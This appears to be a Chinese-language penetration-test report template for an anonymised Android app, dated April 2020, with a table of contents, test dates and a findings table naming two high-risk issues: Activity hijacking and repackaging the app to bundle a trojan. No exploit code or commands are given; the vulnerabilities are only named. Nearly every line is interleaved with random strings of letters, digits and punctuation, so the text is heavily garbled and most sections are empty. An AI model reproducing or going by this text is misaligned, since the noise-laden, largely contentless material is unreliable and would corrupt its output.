8 j. l* D2 }3 y6 d, m% q7 b7 v- K( L3 Q( s' G8 k
^; X. Z7 _- x% a
/ t- X. D N3 Z% B! h" A3 b. i8 u J
* @1 `6 R1 P1 g1 a" Q9 X) i- q/ n% e& Z: R
( b, D" p- c3 N# C2 c- I5 t) H8 A4 a! [; h
3 A U1 D8 o/ H3 d9 q$ ]1 m$ p, ~4 b6 W1 b% t: e
) ]: Q" r0 ~( Q* _
# x5 j- I. t* T4 F& N
文档编号: ! ~) G5 j, ?( \2 y& O
& P. k2 J, v" ^9 C
9 l8 A7 \. [" @, F' {4 n$ b
, I8 Y9 {. o; C2 I3 i, `7 F( }- T
- L6 {, h) z# Z! i t9 k- B, }' ^6 `, V/ w0 }
8 i# ^* e) b, G) n y* }9 q4 z& _, H
2 e1 ` d1 X' P1 a- r
& I0 F' J% m, }! ]: g! P
1 i8 C8 N4 j+ s, m1 k
9 N3 g+ I6 D# T( M; p7 m2 x% b4 o2 a) W8 I! m; G) i+ r) R
7 V9 T6 V3 b( C5 r! @# L, R# M9 q$ \) a; O
: b% ]$ b' w$ ~1 S: L
) l% w6 P( S2 C; s0 K4 w; I
7 _; P9 l0 r. i9 f4 Y9 _1 I1 u4 S2 K; R
% { P$ c; b0 K! l2 o% l. |8 F
. R8 }. ?/ ?) }* Q2 C) [ |
3 ]& T# \2 b7 e2 s; F
4 h. N6 b3 m `3 z7 J O1 A
* K7 F( A( k7 m5 g0 u3 h6 D
0 G5 c/ Y- ]# V
% I8 Q F6 G: T' N8 F. S
+ ]1 a% I& I- A& `& K
7 R0 s* u4 A0 c+ v* T
( n8 L+ P: v e' k4 e+ o. t. t3 a , A ?6 V2 K8 H- T+ I% o" _4 {
2 H5 ]4 P \; Y$ p8 M$ _' g
5 I u/ D+ w- m2 z, p3 M9 \8 E' |* h0 ?
2 R" [$ v& t, V! {7 H9 F' n
1 H% y7 |6 `- _' I9 Q* S4 v4 p
/ { u2 [+ v# Z& p+ m9 t; E* a, H K) s- [* E1 P; S9 b- T; c
某某某APP渗透测试
' U- c& o) ]+ r
! Q$ P. E6 a5 T2 |; z' h
7 u3 v! ^7 Z( m7 i% v+ R4 s; p
/ a( n" M% c3 D+ ]
* O* ~# I7 s% k
) q$ U: f7 D% k$ E% p6 l% C
2 z i( D3 b! d( L0 D$ T; s1 A `% F' n+ T: C
: D" I( f! }( f' ^( g( @, _( T! m) y8 W
+ h" x* \2 t/ Q# h
% f6 }, y5 S0 W! v( Q, E. L; s
$ n* w0 c7 ]- z: T# C8 \# p& ? ' F' O& f, G, b4 ^4 ]) |
w4 F7 G7 t& Z1 v0 B
/ D* v; f4 L, S" G' p, P( \0 a2 V4 n
1 |8 N" Q4 H x3 t, Y
0 w4 c/ D' U9 }/ p' {* E; g
# G8 v' u6 K; }( w" y & s; u% |6 [1 ~; K' r
* p( r5 f- i' q% O6 |1 W
- j' ?: @4 j f/ U* J
+ |5 y! T2 a6 L% ?5 L' @3 X
" V0 D$ f# `: [: |+ C/ Z
( M) H6 x7 q" K! j+ F* l
' V3 \6 g! e; `$ G4 O" }& r# l* a4 W. P4 m5 ~/ C/ K
6 u/ Z! i$ _- i: t: s5 O5 Q
+ e% k9 `& Z) x- h( c" z * Y. w1 p; k7 X
: d1 F; d% t# \) E& n 技 术 报 告 5 M/ h- L7 o) D7 V0 t7 g
$ s5 e5 L2 V' T# E$ F) [/ e
6 `- W# M) Y$ B: x" Q9 y+ h: K
4 c$ j3 e- k8 u8 L$ l + k- E; s! s& q4 l9 b0 w: m
+ w2 |1 p/ S# I, x
* H0 i* z; j; c( N: Z6 ~
) g; y ]( {7 d" p0 W1 n7 [1 H
0 E+ ]8 s4 J0 v/ l) X7 |" O
- O- @) b: a: V1 y% \# d4 r ! t- W5 ~# O& _* Q( _" h8 R
! Q" _# c% g) ]
9 x7 s# T7 `4 p7 p0 S; d* s+ K# b1 M% h
( l7 t& W3 x7 R* w0 s+ O
! v* T2 ?$ [+ l+ W0 s5 j/ x ! N% o% d1 o" S* g) }+ X" H
' x4 g k# k2 X' Y
3 I5 U5 }& z' \, I2 ?# a: s
, P! a6 H5 z/ Z
z O0 G3 I6 N5 D) [) u8 u% x# H
, k& {: G5 O: G" h- d
# E( p; J" n4 I0 l$ v
2 R4 V: d; d; X4 ~: @
1 p7 G4 m2 E7 v* \5 Y. b0 m$ q% ~
0 I- s" A) v# |: e
. g% J& M( J; F1 H+ J i
) Q$ @, \* O/ y1 D6 u4 @1 P& l# k8 N. j# w ?" L) A
% j4 w& O) g0 w$ a, N1 I8 ~* U
9 s, i& e# Q. h7 u1 o$ k
8 J, `0 S. z& Q/ \
+ f- D4 |/ O" N# D( H) o
. d$ L7 n9 K- [; p
% Q7 @5 D9 i! }" _0 t B
' a. s: J2 w1 V4 M' z3 z/ M! Q* ^0 R, ~' o
5 e$ q5 Q( s o
" S/ _! o" _( `7 l$ } / e1 n7 G* B0 p/ l# D8 ^
$ r* U+ C+ J2 N 1 u* f, O& U& z* Y1 O0 y4 i
2 D4 g4 A( \0 \, _' O2 j! `
[9 w& I8 {( W$ [, y
9 X3 q+ P( K- I$ w* g* {. D* ^ ( ~: V) |$ w/ Y( N
4 C7 S8 G' L1 d4 P/ }! ] * i; n7 _ @1 I1 `, p
0 F' u- u8 C* P6 z2 Y4 E
: P# `0 L7 s# n. A+ I c, ~
; j8 Y8 H% X# {$ i M
- \3 L. C* m; j: v5 v4 b' X
3 U; a' J7 S8 n/ |! I% r* ^ I 6 v4 V$ c3 m: u: y' d u! _
( p( t0 s- l5 g- Y4 x; H
7 e% S7 s8 K/ P' n3 H c9 p
5 H) q- n+ \. ^ y* B
! Z( J+ O: G9 z4 N2 J8 J1 N" t; y0 [6 @: D& R
4 f2 w$ N! c* E$ @% Q ?5 y
7 p n) S# r+ y# k$ P9 H! e' F+ i% i1 W
0 W& w5 Y1 Y7 w
& Q* d s" e a2 k6 H$ F( i
, I4 d2 o p1 n' f& L
3 w- ~* X9 J4 u
: x- D K; _# _% h6 {7 l; F1 @1 {! j- M
% g9 b. n2 t2 X6 t0 Q
. q# C! C, A9 K8 ?
; E3 Y( J4 h4 n/ V$ u2 I
8 K2 G/ m- U9 R* @' _0 y
w$ x" V H8 @* B3 T+ O9 ?4 Y
4 p" ~) F, M9 p: f& v% V
* D K0 |: T; R. t
- P! X, s5 \3 y. u1 a/ ? ! n; U4 B$ d8 n! e r: X3 ~/ |4 j& G
Z2 ?8 M/ k6 C5 ]
! l: a, p2 Y, d& T( U0 `8 O
! ]+ X; N: j1 p9 {! W$ l
3 Y g. ^& t' H
! u3 O: [3 R! @- `
2 b. D( {8 C, W9 M7 l ?4 g7 R6 R* ]2 x7 @7 b
: @: {) ~, M) C0 b
0 h/ j+ Y* L: h H2 n" F
1 P* v/ m6 D: r& A/ F
5 U1 D1 O- s, W+ g+ C 5 @5 X" z5 _; f0 R j/ u
2 B5 M5 r4 a3 F
3 A# o1 p: Q5 \" Z0 G
7 o9 k7 [ q( x5 q# i
; J1 o3 v- i. ?2 W
4 |9 E" B/ j* B& ^/ n9 D ' j6 Q% E4 l+ G1 F$ G# F
1 `" S$ k) p3 m" X: _0 a% ]1 S
3 Z3 g2 q4 |/ e
; A, r/ A( q: Y4 |; ^& Q5 l
+ a$ S8 c+ U. _ F4 E: n% e! N
$ u4 g7 q# \1 t0 U" o
/ Q }; I5 @( p1 P d0 v6 c$ I# L9 O; U k
! l9 W$ g/ _& `3 H
" R2 h7 u& j9 w0 Q
! F: b( I! N+ z( U) j' a$ V8 U8 r
% f8 o$ u# i- F% h6 G- C
% T. L' x# M2 {
6 ^2 }9 m: P! l6 _, \7 l5 L
3 r" O a5 b2 m2 D9 J& |5 u& K
$ `4 V) Z g) l$ e$ ~# U, g& X5 N; G2 L' Z% J+ w, r" J
& \. s6 r! P; O2 V1 y- U, j7 S- }7 T' j9 `- j! q
二〇二〇年 ! c) U# {2 I+ Q5 e- P2 H+ J$ B
7 Q, b6 Z) f( n5 I$ T& r
5 x" {2 t4 p, L! X0 M- }; F( @
g6 w8 y0 X) p# I1 _
2 j' x: X u6 \9 @/ Z. E6 c( ^: N; d: L: ~! r! d. g
: d8 r- H( ?. J' G8 j( k
' a; p4 ]$ X1 W4 S2 B& C X8 b
- T4 y) q! a7 R- X* Z Z* {( F
5 L0 h- f* r# W% j; n8 g2 l+ j( c
# E- o/ {: x) ?, k* B6 h( c; E' \
0 ]# p& i' r9 W/ C0 u/ d
% O1 y4 Q4 \3 e. Y$ o- [/ a
( [ I/ Y+ E" S: V2 s6 h! ~4 R9 W
/ q7 K$ o# R! J0 q7 l
$ F( H6 D9 o6 y% m. t$ S
: l. H) R T; I0 m' L3 ?
; [; K- u( z) Z. c6 ~6 Q ; c, C( S1 F% ^! \2 t
# R& b; |& \8 Y4 [7 b: p + Y9 V4 k! Q- D$ g( C: b
3 b) Y' R$ d! ~; ?8 [0 \$ K
目 录 5 ~. h9 L- J+ a! o/ c( m$ j
* h2 D7 f1 g$ ~
: i* D6 Y' o& p5 V5 v
) c( G. a; u4 z" w" i
8 S8 G2 _8 s- V+ e* k" ^: {# a0 [: `' b @* P+ [4 r
1 P7 D6 D( O. P1 d3 V
9 e: g$ m& z* ~. | : b/ o* [- Z$ }9 z5 X
5 l$ Q/ I4 L0 Z# e' y
1 R3 |1 q+ q/ @3 |9 |& |9 C) k. _3 P& ~) d, w
% d# W$ t* L3 x ^/ @: T) _0 {/ r% F* u9 b$ H
1 概述... 3 " N5 f O3 m7 A" M5 x- J/ B, n' v
* J+ }6 d$ J/ W* `5 m
6 q) \3 j( {' d- F# n; _8 L1 \5 A3 @1 f# R% f; y0 k, I. o m! ~
2 e! c1 E- J! X
" J) c9 R5 q0 z6 w# E7 V 1.2测试时间... 3 7 x0 w0 }; ~( ^9 p- B# V: `/ u
G% c3 M( p6 b. i, v2 Y0 H5 e- a
" T6 f! J0 t1 J) s3 `% N
$ r1 J' E4 y: r! D: i; e$ v" U/ @9 E
+ D4 y, w, {& H9 v+ ]4 P
( a3 h" N2 m0 H( x3 T1 [2 Q 1.3测试对象... 3
8 u, I. k% B/ R# M, a# [8 x+ a0 F
; q1 C, b/ u+ k0 j7 C5 y9 k% `* p
! u4 |& q" [3 W! k
' ?0 M+ x6 i" p% t( o4 d, F6 Q/ Q 8 z0 F9 Q* Q: d0 G; w6 T+ W
+ ^! y# `# {# A8 B! t: r 1.4测试结果... 3
: n( V$ d2 d3 c5 e! n; A6 h# ~/ G a1 Z% S
/ _/ q# \7 C9 ]+ y. U9 I( a' I. m" V s7 r5 a" l
" O& A6 A0 ~5 k9 W2 a
' z2 y8 l$ s& Y' G. G* u+ x6 N8 v 2 检测结果... 4
$ I) \3 ^' [7 q
0 \- Q9 `9 a5 w3 Y
' J: n/ J5 R! G( W6 m
( }+ D7 p8 V. T6 J7 v/ w+ ^* d
0 _% f5 u4 s2 H' n/ w2 @) E+ N. j9 j7 t7 k1 y7 _# e! \, M" O- K
2.1 某某某... 4 {% e/ Q$ f5 U5 H* ?* J. @
% L+ y1 z1 W1 ^5 w9 J& [
" m+ a, c* s, o: I4 h+ w* d: C
9 r* w7 I% b: o1 s8 R3 }
, k) U0 \, \# |- ~4 \9 ~. g* k% _* v- b0 H1 `9 r
2.1.1检测目标... 4
) w" N# |$ c7 L/ T0 e: p
! p# W8 p$ w6 A6 ?' H8 j z
- O( w3 a& W7 Q- h H; T/ u$ k( ]6 M+ f9 {3 C2 }
7 G8 k3 Q" g6 i$ G3 c% F, V
' R& G3 o/ g* S e8 `- H. `! u8 p
2.1.2检测结果... 4
* p, r; o. @2 f- Z& C; J& T+ N
, x- m+ V) w0 o3 y* L0 {
! n9 d% ~9 n, A; W( H' G4 p/ M8 Q" x
+ f( x! ]+ ~4 j4 Z# _) P7 }5 P8 G
/ s. T5 O z8 U8 e8 M' {
8 s$ F* S# t- [+ P. X 2.1.2.1. 4 & M: ]- Q' b6 K) j& m
) g8 D2 o4 i# e; v4 J
/ u% S4 b1 T, X* x
8 ^/ Z0 `' H9 r" l! f
$ n8 Y v! ^/ E& p, l6 T$ ^
2 n) }" t: |1 C" z4 A, Y! k' l; k5 f 2.1.2.2. 6 0 U& u Z& O9 K3 F) i \8 u
+ L5 y5 f& _; [5 V+ _. D
# ~+ E- |# V/ q- Q) V: ^9 m8 c
! M+ Q0 M8 c3 k; d4 e) k 7 ?1 A% r" N [: @5 q, X
, q: o. F" f8 A S) c$ [; Y
0 N( P$ s$ V8 r" N
5 u4 o$ [: a* p
; k5 W! O! C2 |, E1 K) M e
8 R8 E1 c7 `! q n' N
R' i" @% }3 n6 h' j1 A
' G) g( ]( ]' z
: Z" s+ Y. l5 p8 B& x* f$ Q+ w' ~
0 ~; g# f4 I* j8 E
p o5 J7 q! W% W- \3 A" y" n* m9 X! s7 G5 ^
" J% ^1 g5 }4 x- U4 Y) w# Q/ x2 \$ |) C: {
; P9 K* y$ ]0 `3 L8 d, |" B& R5 U: B8 ?7 q) T
1 概述
* i) C- f: U. i' k" h# S/ W& _
8 A8 T: b# | B+ g/ _% J u. `
. y% Q# u8 h& I. h F
+ c# g2 b7 l1 w' \' P7 n
C. M: R; l3 s- E& E
- d @, s4 X N4 m; ] 1.2测试时间 0 h6 `. S% e# ]3 x
0 @9 |* g1 |! s: L$ U5 E) P& q
$ z4 U6 h5 g1 F* Q I$ k, A' ^
" f3 [- d* X8 s1 q$ I2 L
3 y2 D9 @$ A% U: r/ g% S- r" T/ G+ n
- J3 c) P8 v" x0 f. B7 _
9 `7 \+ y8 p6 I5 \2 z$ @5 V/ {/ j8 K* r' m$ |! h! v" F
" @% h7 _8 x! x( g" X0 r7 p/ b0 d6 {8 w1 ?
: {$ l, g2 Q- ]& p. m& @' r# Q
* U1 p" A& F+ i8 K K
6 i9 q- L" U5 `4 j2 y" d2 f6 j' D2 D0 I, \
渗透测试时间 / o! V, @6 D- J* w1 \
3 p: k) k k# U3 W , w/ f& w/ Q, U! w7 r
# z# S7 h; S# q
|
3 M4 N, M& |6 S! Q$ k* B, m2 F5 _8 M E8 ^7 z. `; e
' J6 S4 S) j& g# i# u' m
7 a5 ?9 K+ p' A2 W $ T( K, ^6 C! W4 P) O
W9 s( ~0 Y3 u F 4 z2 t/ `# U$ m5 u5 u) f8 f
r, M/ B# D/ ^- {% p
- A4 d- m) S9 T3 ~; e9 f
2 {* s$ W, J: T9 A$ \6 }( d
起始时间
) a4 c, v- w% J" R, p
( f. m) y2 T! V$ X
" a4 E9 [/ Z( H$ \
6 H# Q6 e6 X s" z |
8 K& ^! N% n* l& O/ `7 ^8 r9 r
+ ~! w, d; |# ?$ h 5 r7 X" o) c0 R# {: i% v/ `! L+ _' F
) s# M8 j, p2 x0 s
# S' G9 J$ Z1 b+ D) `- n8 w& `* v/ D; W n5 ?7 w
2020年4月6日
6 T5 d/ t/ n- d) E
: y6 A0 q( ?. \# g ( V+ D- ]/ \# L5 u
t/ }. R# J8 S6 ^ | S# l/ R; }: f6 M
4 a/ t7 [9 X( C9 L
6 S1 n7 x( s2 {% M
; h. F. R- \# _7 h+ P- Q- y
. d! M+ d& D1 D/ D F
3 T/ _7 y8 S$ Y4 f# Z ' L0 V+ J y, d6 @
% P' Y, R8 D' @! x: Q
3 i1 X Z8 ~) G+ R5 I/ m; q* h
/ c' y1 L1 S: d0 i, V! {$ @ 结束时间
# f( b* B) \/ L
' F! p u# ^0 B& o F4 \0 ]
" u" d; i7 X, J$ g) ?. @, Q/ E( J% L4 N; W: y/ c1 s$ B
|
j5 M4 i4 f& K6 ~$ X3 _9 A& H% Q. u- L$ ~; {% ~% `. @5 A
; B- A0 w9 {: o/ p9 j1 Y9 O, ~, ^: D5 X' {+ w) x
0 E& V- u' B/ W/ b, Y/ J$ ]0 X9 d* }* e4 j& N
2020年4月9日 1 l3 k7 i4 O. N1 ]1 z0 H
! P* m: q% k7 I7 Y9 l , U# p3 z$ w5 L4 Z, N7 Q2 L- I
" u& k; S" j% n4 E5 D/ a; d
| : D- F2 Q+ J( W# E# S
& ]. b" w4 c p- ?
& S) A# S8 e+ K2 x& Z
8 _8 y2 z: ]1 x1 U/ k J
+ d {4 T4 I# p+ I
2 Y' C- C& l# u5 _3 C P
$ A; z& l( Z! j
" m( F, k) K' p& \' e- T) h! r ' C R8 Z/ h0 j: F' c1 o
5 ?6 G, X. o% v" J6 S) R: p
1.3测试对象 9 U, |( o/ O4 Y6 c* i) K8 W, G
+ {8 R9 W& _/ V5 n7 ]/ O
# L: C& [" s& O
. t( R' K- p4 z% \* z
" |! S% s) k( m$ v1 u% B6 I8 D
- N" t: {# r: Q0 i) D8 R6 ~' E5 _ 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: % u7 X4 t9 p% B$ s2 \
5 _3 u' ?* z* x# Y+ {3 A% j
7 i8 j. D& H9 ?0 f1 B. k' Y1 I: l
; d3 Z! D% e0 q& m3 ]! n
6 T% R( C7 X+ P; N/ S" x# j1 J4 Q
表1-1 检测对象
+ P& E0 P7 s5 k
1 S3 o& P6 G- f9 ^& Q4 x/ S* p
$ y0 `& j/ h! v' C! p' {
) T. p2 n- Q$ @5 H8 P
( X9 R7 v9 {4 [5 \' \) P- l% [/ r
/ A# }9 ~" P( |9 `- |2 y" I4 M
" v& q7 b- M! `7 u" s; v) u+ _( p
} _& S* F5 J4 s/ Y
/ s; v3 j9 k8 k: u! ?
; _8 }6 Y# m9 v. {1 B( ?6 [2 ~( g% ]5 \- y& X0 V3 i! o" G
$ n; C$ Z( ?( w
' d F4 Q3 e& q 序号 9 {& M6 Z6 t. D5 X" V; o3 |
; p) i( L" |$ H" r/ d
& U: t- Q) o0 j) n; ~# W
" W, V n1 f- y6 w) ~ | ! U8 \# s- w7 ^4 K/ v- K
7 j- i; T& p3 H # g- _8 {3 C" A9 E
7 P3 \0 f0 D) B& |
3 o9 P# d1 A% S) l3 }3 l7 l7 m( h( |9 M6 f5 D' m
测试对象 ' s2 J" _3 L: Q% g {5 S
: n0 ~% k' Y0 u [4 _ 6 a# Y2 @. i6 p8 s- ]: r* ^# `% o
. ?+ E+ F3 k0 s. C# `0 {" a8 P
|
! x' n! q" O1 W5 F) i+ ?0 X3 ?( k% f/ Q2 F; X" S/ P) p. O
) l1 l# p. m- A& t% |" f7 _
8 k1 ]% Y# o3 \/ E D/ r( d
" ^# q, M5 X' @) I5 @( A' W: T% t8 |0 J' N5 v
测试地址
1 l% b4 W% e# ?7 u! E. d6 A$ D! @ Y. N9 g) L' O$ X
# w7 G$ v/ n* G2 ]) ?8 U' T
# @) y q: t" l( s5 }5 [7 ~
|
/ ]. A" _- i6 F% x0 q( t2 p! Z1 U% o; s" v( k4 u8 X, S3 \
! U1 }' `: G5 _" I; L
6 V; u, W! @/ X
, T0 C8 A5 l/ _$ K" s; S9 \/ r8 n& p: c
: u" a. e+ M: A9 a; g1 @# Z( Q* c 安全漏洞
! G8 b( _- F/ e; |9 w. D6 ~/ p
% T9 g6 _$ Q* [. w* c8 G
1 `0 R# V7 G/ {5 n9 h1 M. u
6 @# S1 v8 W# R. r. |0 \) B |
% \& s: C+ ?3 x" }
9 w5 Y! L) U+ C% `6 }' @0 @2 _- f
) n1 @' t" D1 S. A0 p/ `/ s2 H4 N1 h% y6 z
) t# l5 ?& I$ O& F
" S. S" g3 y$ f8 [( m8 {
$ V8 m% P' N9 c4 W/ \: h [% ?% H6 d
4 |2 t2 o. v' X+ Q# G
! L0 f: j9 ]$ w: C. f- N0 W 1 ; o9 l+ y4 I5 J4 t/ b
4 W1 d& q' \: Z/ I+ h & {7 @/ T& z& f
* @2 n. _" {2 q, p3 B* F4 d& B
| 6 K! v' t4 a8 `/ u' R
) X/ d) |3 E4 @/ d
) p9 h7 K- |2 j! D) [( Q- f' u$ R, E
% H6 M$ ]: A! c2 @, z s# S
0 N; v* w n! ~" Z4 Q5 S
' U- C0 q, R0 j 某某某安卓APP + u: f, g! Q2 M5 ?2 e" K4 E
' q4 E0 P% M( c0 u3 S . [$ h* l1 W! Y S1 n. p/ V
( z! ~) f% `. [
| 8 N8 i+ U) z1 v; x/ o! R
0 L' l5 u* I, b* Z7 P
( f0 V0 a7 b8 B, C
# Q5 ^. m- ^* ~. ^- [7 C: _5 N7 ~
; }9 Y: |+ N; w2 ^
0 L4 n6 o6 [# n9 a$ G
5 j$ `% Z4 l H# G3 `; d& Z
. r/ \7 d l) N
5 S- H# J+ X+ a
8 I6 H" m2 ~8 h | ; @* Q( G/ ^7 q
* A l6 x- V+ h" w
' Y7 W4 O- R! B2 |8 E
' k" x0 `! f9 p: G
7 ~0 E2 `6 `* U1 P! b: F1 S4 J% C3 `% m+ i3 ~; q
2 / z: q; _4 Y8 C8 W' t: I' | w, q
) C+ D# b' ]: J8 P( e* ~
. M# b( n6 M1 m! |2 G0 v! `
' `2 x8 S+ m6 J |
4 w+ o! u& t: M8 v. |) t1 _( y: \3 p4 U* c9 l+ c
S+ R- _2 v9 ^; I5 |
( N5 F& {/ g- c( `; K2 n
- _* S2 [/ u0 i( H
9 ^+ F% S! d! p* u
0 w' P+ d( G' v1 C1 u0 T
9 N+ o8 ^+ E- n& s; T: }9 N& A
: @- K# X. F# H7 @' d4 a( J* i8 m; A, L5 v# Q+ h1 K% C
1.4测试结果
; I4 ?: c% Z" p) p
4 ?* y4 E" l* x! ?: p* G
, @" M( j# h; P+ N& c& g% B! h8 f( o6 K j, O0 M ^% ~- k7 I7 L
9 |3 ^, L4 e# Z+ r* b6 t/ X- ^' ^8 `# H9 @/ k z4 i7 p, v. n0 \
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 4 G& V) x4 P& I# C' N4 p
, B a, H3 R1 g" S8 ~
9 A, w$ i- \+ o. ^$ F+ M& \
3 Z" j# T2 W& s C, ?4 `( y. ^" k( z4 M
7 Z+ W' J; n! C h& M
1 q1 N. b6 \& I! a
( e, @% v, _5 l9 }4 p
! I& U, j4 e1 O" d9 a
# G$ S( X% @4 n+ ^
7 [6 n8 g3 R5 _* Y
4 k5 @! h# A+ w( q6 `. l & Z9 C) d, }+ O2 w7 A0 U
* @! P7 E1 O0 A+ W n' x
7 s8 ~2 J, W- V( d& Y' M) r2 h. D6 c/ k+ e Z4 j
' p8 K& U8 i& i1 Z4 J. ~3 W3 R
0 O! H: o) s: Z- M
- [7 G; q! Q) \2 F* f/ A* o6 l0 @' X2 E
. `: Y! _9 }# j W( `: M
, B! m A7 n9 N( X( f3 c
序号
3 J- _0 G" \6 m% _7 }) J0 v; L6 {# C+ r0 } l, k: D
) C/ H& E9 p! Y3 \( T" @& G
$ ]* ?- l& b- E
| ' |/ e% \8 j6 u/ I( q* o5 T' p
9 Z% t, E4 J1 ^4 q/ b* p! t
2 f" ]- }2 y, s2 r' [. \6 t
2 f+ _" D' q1 P2 M; q) o \2 g
S1 h4 a" I2 F7 x, k/ c
) R# l( G( n) d9 l/ `& k+ \
系统名称
, }6 p: l3 x& `. p6 h9 i0 l+ o! }% v
: m9 u2 z$ T" o" K7 s: v 7 {. M+ k6 x/ K- e w& C
. _+ J0 j, Z/ `; V |
, g% c2 l& N: b( ^9 k% z) @7 H m3 t6 ]; U! Y; k
8 T+ v+ D, Q& r! y5 z% X
- S! p6 _1 z9 N4 ^( ] ) i ]* d0 F1 @+ R9 E/ v
. }0 Q) t3 r4 g# g: K4 T7 o 漏洞名称 * @ `/ ]2 I2 {- K0 _0 Z+ C
% T6 O, Y# S) N! [- o3 u7 V
; k0 X& w: j# c! T8 G& J4 }5 Q9 l" M8 I) d
| 6 Z, P: E* ?5 r
/ ]# {9 b) A1 {# G. C9 }4 |* l% C7 ]
4 F* s- s8 n$ Q& G0 k! U: |& m( F) j/ k6 ~# q( S
" h# [2 w \6 i
' f- P' }% G; ^& j% B 漏洞危害
1 t) I: J3 C h: v( i( p$ o9 i- H& r0 n8 U: q& f+ q; `
2 e; B( `# H* L
& l+ ^. k( v7 X- }! \ | / T% b e3 @& E- ^
1 J# V/ [" e+ K( t5 J" U 6 e `- f; h$ l; b. |/ [
( w. C1 D0 Q# g- G/ K! T' s. @* E
2 t* ~+ l% M6 }7 J8 \
" ~3 v, @' P# \% Y* `9 t
修复结果
8 W. V! o% i) e" J S6 z# b( i& h# m, x2 S3 G: @( _7 o
" a5 ?" M1 y3 Q8 O' [9 K- z. q+ t D2 S& g- L
|
" }% ]* @! Q) K& h7 c* |9 m Q8 P: z! A
+ I' `* o, p' {# O' V9 ]# Z( H( c
% [3 m8 y1 z1 o8 V. {7 f5 [
4 N' i' X0 X B, u6 a1 ]
1 k1 E* p6 ^; P, d! f4 w* e! _& j$ N$ X$ W, `: Z ?
3 Y0 H8 ~9 J! v
, _9 [9 r" ~. f* [1 c M/ H7 K
: D0 x( G* u8 X
1 ~1 N4 p0 ?4 N
1 6 a/ m+ l# f& W% M9 G
- E# D! ~6 x# `8 p& ]9 A* _) m
- N1 ]( I% u+ I5 u6 i) H! Q, I1 u
: J6 E$ a- s! V; X
| 6 `+ Y" P% t1 O8 C% M& A, e* d
2 t/ i0 s+ Z Y : q" p7 t. j' z1 ?% @4 J
2 v/ K. ?$ p# d, J: }, A
" ^6 r8 X# n' l) X2 J
6 Y7 u2 r$ |( g( a4 _$ O. n 某某某某某某APP + {; }% L3 m# f0 g! I
0 S9 c3 m+ J, i: Q' v; a0 v+ y
# Q) G4 V8 C( c3 w! U" x( y
4 f( O9 }$ I7 J) O/ u! D# b | ( B& W; X1 s$ q3 f1 x3 x) }
, H# ^: Q. m. L
+ b4 Z, a; ~! f3 P4 Z" \/ E# A6 X2 i) W5 i3 V
7 B8 r0 Q& h0 A* w( C3 L; f* E/ o( U% h; x/ D- S/ t) q
Activity 劫持 ( T- x) U/ k- l
9 q$ t# i7 n8 r" K. E5 W
2 b' P U; R3 ?# S( N/ b! {0 L- H S" |; C$ F+ X L; E
! l) z# B7 B: @) j- V
8 j- t$ ^) K! q" e/ Z - {- H6 N; i& @+ i. ]5 I
9 e& V$ O/ {& ^; C: ~
1 k# b* |3 j7 X6 b
8 \/ d" k/ k: T# E4 b |
3 t" M6 s& W# {& E% ?
: C7 H) p1 d3 V' d 6 a5 _2 A8 x' C! p4 k! d
2 Y. ?- }; v" z- i& f; p" C6 R
# b2 W7 y2 j8 R, w2 H0 W* N
# O W, Q# L; [4 \! r2 l9 @ 高
+ w: z4 O; [/ T8 | V3 w; g: M# D" N; d& T( O# c/ f- g" ^% c
+ n" C% W9 X8 O! X$ d/ o. \4 W1 S& r( B1 d# q6 w, h+ f
| . h* \+ ^( W' Z0 o5 x
, N V; J. j! A% z% k0 y+ ~! q& ?4 {
" f2 }8 x+ {6 m' U
5 K5 m6 \% ~* u$ B; G$ F) |
* n, H5 s8 M6 G4 L: o- P, U
0 u) D0 n1 M4 O, A, z2 P
; ~: E; p! [- `- m% k L# o: u7 e2 {' ]: p
) ]' T1 q( \/ M. M4 d
1 b. w& _, }; f% M% X
|
# u( O7 R/ l0 E
a( a9 D K8 g3 k2 d
+ F2 V5 I2 B' |6 q3 \0 V* @, U2 L, ?6 F F0 r; A
, [: M4 ]6 z ^+ \! @$ ?$ x. p& Z
' L+ D, i! w' j% a! G4 u
2 s6 v- g6 V# ?" E
+ o. h$ b# F; ?# ]3 U3 b- m# f 0 L3 x/ q6 Z# U) a' c$ X9 ?2 `
. O2 {. j! ~! u( v# w& V: h
2
@4 S1 c! z8 `& E. ?5 ]: |9 {8 F% Y. f$ _
5 g' M( u4 c5 T
# j( ^/ e( f0 `: ^7 ]& P |
" D0 ?) t0 a' l1 H* I
+ ^9 Q0 |. ~* t! G& D4 n+ p. S 1 ]3 I- n8 r- \3 E
7 g0 Q: Q% w! j: F$ l& T 5 p- I R. d4 @" _- }* o
3 C8 {) ~7 e7 ]
某某某某某某APP ( I4 O! }; v, g0 `. |2 X) N3 R! ]
# m9 I6 [. \. J' Q3 u/ N 9 B+ S4 H, M! d: q
, ]; Z7 ~7 k/ m* R& i x/ T | 3 ?( z; [7 n$ u+ s( q' l! r
- m1 R. M9 y' X I) d. U
u3 ^# z$ p4 Y, k
% K: N$ K7 G8 ^( | c- i 0 ~/ t& m2 r. [# J) p0 v$ @/ }
; L- E% L4 I* q3 w
反编译二次打包捆绑木马、篡改APP代码 3 {8 q- u" q+ e. y
0 Q$ c @1 i/ P& H( G x. N% J
( V* J1 o, F2 h: m2 X2 `' ]0 P0 H5 t( L& `; {
|
8 ^8 C6 s; s% {9 S3 T) N e7 O3 y% S' j
; J" j0 G" \( l c! [, ~2 f % N) X# k9 \3 u4 A" m7 `
; |4 I$ Y. p0 I: V + p( @/ P& X+ f$ }+ U) u
5 f' K4 k6 H- G9 K& c# ~; A4 x2 [ 高 7 e: q( z( U6 r8 G& i( c1 ?4 j- B5 T4 P
: Y6 b8 K$ K) k0 h
2 c5 c! V, t4 A% R
9 Q* k' _2 |& L! v ^/ s7 O | ; S# _% T8 f7 n9 q( i; X
+ A8 m( [8 L- A* v$ h+ R
- R8 C5 b4 L0 v' d
- i* v9 C. L% k% P4 X6 v
, }' W. D. e: A5 R1 s3 F
6 J2 i% Z6 O$ ]9 u
3 c, Z6 w3 b( [6 |/ d3 S( p: A: ~! V, w0 ]4 n* V; D* f
) D3 j* v; T& {8 Q& T4 n/ O# _" {- ^! ]* j+ u
|
5 [. w. k5 \5 M/ O# j$ e: ]9 Q7 S
+ d9 E ~) L5 ?4 Q) [" y2 Q
9 Y( k9 ~* ]6 K: k$ i
' `8 {/ p, I" o. d' a1 g. J7 ]4 F0 ^
) j9 i( w N* a! z( K% k
9 k. \3 M1 E/ ?% ^1 F
* v3 [2 q+ L- `3 b) ]. ?7 l0 c& P2 K5 \! l2 C* f
